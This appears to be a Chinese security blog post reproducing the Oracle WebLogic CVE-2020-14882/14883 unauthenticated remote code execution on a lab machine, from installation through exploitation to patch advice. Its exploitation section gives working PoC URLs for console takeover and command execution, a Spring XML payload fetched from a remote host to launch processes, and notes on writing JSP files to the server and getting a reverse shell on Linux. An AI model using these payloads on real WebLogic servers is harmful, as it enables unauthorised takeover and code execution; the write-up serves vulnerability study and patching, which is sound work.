【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

  • A+
所属分类:安全文章
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
点击上方“公众号” 可以订阅哦!

0x01 前言

1、漏洞说明
远程代码执行漏洞 (CVE-2020-14882)POC 已被公开,未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。
2、影响版本:
Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
3、漏洞链接:
/console/images/%252E%252E%252Fconsole.portal
4、环境准备
jdk1.8.0_171
fmw_12.2.1.4.0_wls_lite_generic.jar
5、相应环境工具包获取方法
关注公众号回复“
Weblogic_14882”自行下载

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现


0x02 环境搭建

1)weblogic安装

用管理员权限运行

java -jar fmw_12.2.1.4.0_wls_lite_generic.jar

遇到的第一个问题(图片来源于网络,自己的没有截图)

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

此安装程序必须使用 Java 开发工具包 (JDK) 执行, 但 C:Program FilesJavajre1.8.0_172 不是有效的 JDK Java 主目录。

解决办法:

先进入你电脑已安装好的jdk bin目录下 然后java -jar 执行你的jar包就可以了

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

之后会是这个酱紫(这部分傻瓜式安装【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

2)创建域

全部勾选

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

设置账号密码完了选择生产

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

高级配置:全部选中

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

设置端口号--->填写账号密码--->一直下一步

在这创建

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

等待一会继续下一步----->OK!!

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

3、启动Weblogic

C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domain找到startWebLogic.cmd点击启动

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

启动后输入之前设置的账号密码,访问地址如下表示启动成功:

http://192.168.142.132:7001/console

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现


0x03 漏洞复现

构造PoC,可以直接未授权接管后台:

http://192.168.142.132:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

命令执行----->疯狂弹计算器【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

http://192.168.142.132:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

通过FileSystemXmlApplicationContext()加载并执行远端xml文件:

http://192.168.142.132:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://xx.x.xx.x/111.xml")

PoC代码:

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">    <constructor-arg>      <list>        <value>cmd</value>        <value>/c</value>        <value><![CDATA[calc]]></value>      </list>    </constructor-arg>  </bean></beans>

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

通过此方法,windows可以往images路径下写文件,写入路径为:

../../../wlserver/server/lib/consoleapp/webapp/images/xxx.jsp

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

Linux下可直接反弹shell:(修改相应的命令就可以)

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

通过ClassPathXmlApplicationContext()也可以达到相同的效果:

http://192.168.142.132:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://1.x.x.x/111.xml")

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

0x04 修复建议


安装官方最新补丁进行升级:

https://www.oracle.com/security-alerts/cpuapr2020.html


0x05 参考链接

https://mp.weixin.qq.com/s?__biz=MzkwNzEzMTg3MQ==&mid=2247483846&idx=1&sn=8dd2b7770663e3458117e888208f7f56&chksm=c0dcaf76f7ab266016a6fe868f655ffe75658fa127d223b24a1efe55e056d76a3a600d8858c7&mpshare=1&scene=1&srcid=1102ywVU1T9jszU6Ob0QVVEd&sharer_sharetime=1604285148881&sharer_shareid=9dc1efbf8ece2cc4df398706cc9ecfdb&key=e3bce42fc7df4344d65d653594e1f68103b10177a8895a4a8eb8a02e54849be73c323f4b70cc74487913bdf79dc7a301023bf30bb9f7926f11c897265b64b1ff5ef019c5c67026d4e92176a5e331823bce1e62381b911e2521982e632b770bcd5f671a3d582cbd925c301205c84878cbb22c4c1e1d313925c48c0f1899695d01&ascene=1&uin=MTQ2MTgwODgyNQ%3D%3D&devicetype=Windows+10+x64&version=6300002f&lang=zh_CN&exportkey=AzUNt%2FD5nS1aMRRmh9Ktu8s%3D&pass_ticket=9MsGm%2BS%2FHqh9sqwul2tehaexdZX1X0vuBaa%2F1tUF9hYzG1Aln%2Ba8C9BBEuucM48A&wx_header=0https://mp.weixin.qq.com/s?__biz=Mzg3MDE5OTIwNw==&mid=2247486185&idx=1&sn=6376f69f496f3458c1e6a9de3be5ed68&chksm=ce903021f9e7b9372c5bbc2cde98e9a607bdc915630c55fec8553debf78033a35575b199f386&mpshare=1&scene=1&srcid=1102YvHDsoy2PpA7jHmFG3QJ&sharer_sharetime=1604279921871&sharer_shareid=9dc1efbf8ece2cc4df398706cc9ecfdb&key=dab8500b28863cd492aad5409edcdd03897b62f8571f08da13f3ac74bc095b8d8029239bde2316cafed94155e3d8bc1515e72568e0e2f45dd215fcfefc4fbd597db345e82093639bd2c22b251e802f52526002de2df7f959538a0a9ccc94e919bf4f497e678c4b6efa5aaea5f799f8fe5bcb4c0baa62b18ea12f592308636e4d&ascene=1&uin=MTQ2MTgwODgyNQ%3D%3D&devicetype=Windows+10+x64&version=6300002f&lang=zh_CN&exportkey=A%2BPzCdeFOCXfBMEe5uv1Xsg%3D&pass_ticket=9MsGm%2BS%2FHqh9sqwul2tehaexdZX1X0vuBaa%2F1tUF9hYzG1Aln%2Ba8C9BBEuucM48A&wx_header=0https://blog.csdn.net/qq_37798548/article/details/90255995
文章总结



希望对大家有所帮助【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现


【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

走过路过的大佬们留个关注再走呗【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

往期文章有彩蛋哦【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现  如果对你有所帮助,点个分享、赞、在看呗!


本文始发于微信公众号(爱国小白帽):【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: